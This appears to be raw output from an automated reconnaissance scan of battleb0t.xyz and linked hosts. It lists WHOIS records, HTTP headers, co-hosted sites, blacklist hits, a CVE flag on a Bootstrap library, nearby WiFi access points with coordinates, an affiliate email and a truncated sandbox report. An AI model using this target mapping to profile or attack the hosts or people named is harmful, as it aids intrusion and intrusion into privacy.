| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: MISS | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ply.gg | 185.199.110.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wlan (Net ID: 00:01:71:0A:19:07) | 52.3759, 4.8975 |
| 2023-05-12 03:03:16 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | panel.battleb0t.xyz |
| 2023-05-12 02:45:12 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:53:42 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.109.153 |
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.104): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:09:08 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 1 | 4 | 0 | None | CVE-2019-8331
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:03:26 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0001vrn.github.io |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5cc474dd9f2b1c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:1D) | 32.8608, -79.9746 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | REG.RU LLC | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.43): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache-hits: 0 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 02:53:49 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8000::153 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | exim exim 4.95 | 87.248.157.102 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.125 | 34.148.97.127 |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.111 | 87.248.157.102 |
| 2023-05-12 03:35:10 | Malicious Co-Hosted Site | Yes | Comodo | 0 | 1 | 3 | 0 | None | Blocked by Comodo DNS [00ffcc.cn] | 00ffcc.cn |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | VGF-KonstablerWache (Net ID: 00:02:6F:84:5C:04) | 50.1188, 8.6843 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007-liang.github.io | 185.199.111.153 |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 6 | 0 | 6 | 0 | None | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | 01def.io |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | dave@bradshaw.net | |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | NettWork2 (Net ID: 00:01:E3:0E:70:8B) | 50.1188, 8.6843 |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 124.48.229.35.bc.googleusercontent.com | 35.229.48.124 |
| 2023-05-12 03:24:22 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 403 | http://ayhu.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Filmweb (Category: hobby)
https://www.filmweb.pl/user/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D1:67) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | non-specified SSID !! (Net ID: 00:02:2D:8E:B2:0E) | 50.1188, 8.6843 |
| 2023-05-12 03:11:21 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean, LLC', u'organization_name': u'Digital Ocean', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'05:11:20'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'46.101.229.70', u'continent': u'Europe', u'region_iso_code': u'HE'} | 46.101.229.70 |
| 2023-05-12 02:45:36 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:44:15 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | LILLY_BURSA (Net ID: 00:1A:2A:05:D4:D0) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Dowling_Network (Net ID: 00:1D:D5:13:CA:40) | 32.8608, -79.9746 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f60465c67192a-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:00:12 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | cpcalendars.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:41:52 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: <REDACTED>
Connection: close
Content-Length: 315
| 45.131.109.53 |
| 2023-05-12 03:41:58 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vm.battleb0t.xyz | |
| 2023-05-12 02:54:16 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
</style>
</head>
<body>
<canvas></canvas>
<script src="./script.js"></script>
</body>
</html> | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RossAviation206 (Net ID: 00:0C:42:6C:BE:A6) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.65 | 34.74.170.74 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:54:AE:E3) | 52.3759, 4.8975 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.38): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:11:17 | Physical Coordinates | No | AbstractAPI | 90 | 0 | 2 | 0 | None | 52.3759, 4.8975 | 188.114.96.1 |
| 2023-05-12 02:52:59 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://www.battleb0t.xyz", "firewall": "Fastly", "detected": true, "manufacturer": "Fastly CDN"}, {"url": "https://www.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | www.battleb0t.xyz |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.51): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01010101lzy.github.io]
https://www.openphish.com/feed.txt | 01010101lzy.github.io |
| 2023-05-12 02:45:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://traderai.space/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d08_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d08_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d08_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d08_ConnHashTable<3336>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d08_IE_EarlyTabStart_0xd2c_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d08_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3336"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"191.101.2.55:443"\n "172.217.12.106:443"\n "151.101.1.229:443"\n 
"185.199.111.153:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "threejs.org"\n "traderai.space"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB2B0.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB240.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': 